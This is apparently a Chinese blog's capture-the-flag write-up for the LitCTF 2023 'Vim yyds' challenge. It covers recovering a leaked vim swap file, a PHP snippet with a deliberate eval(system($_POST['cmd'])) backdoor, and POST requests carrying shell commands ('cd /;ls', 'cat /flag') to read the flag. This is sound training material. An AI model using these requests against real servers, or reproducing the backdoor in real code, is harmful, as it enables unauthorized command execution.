[LitCTF 2023]Vim yyds
漏…漏了!
Flag形式 NSSCTF{}
出题人 s1rius
解法
dirsearch 扫描目录。找到一个叫 .index.php.swp 的文件,应该是 vim 产生的临时文件。
下载:
http://node4.anna.nssctf.cn:28934/.index.php.swp
直接打开只能看见一堆乱码。
执行:
vim -r index.php.swp
得到网页源码。中间夹了一段 PHP 代码。
<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)) {
echo "<p>Oh You got my password!</p>";
eval(system($_POST['cmd']));
}
?>
用 DevToys 将
Give_Me_Your_Flag
转换为 base64 编码:
R2l2ZV9NZV9Zb3VyX0ZsYWc=
用 hackbar 发送 POST 请求,请求体:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=
密码正确。
发送 POST 请求,请求体:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cd /;ls
发现 flag。
发送 POST 请求,请求体:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
取得 flag。
Flag
NSSCTF{7b38008e-c387-4384-b342-4008666a5d5b}
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。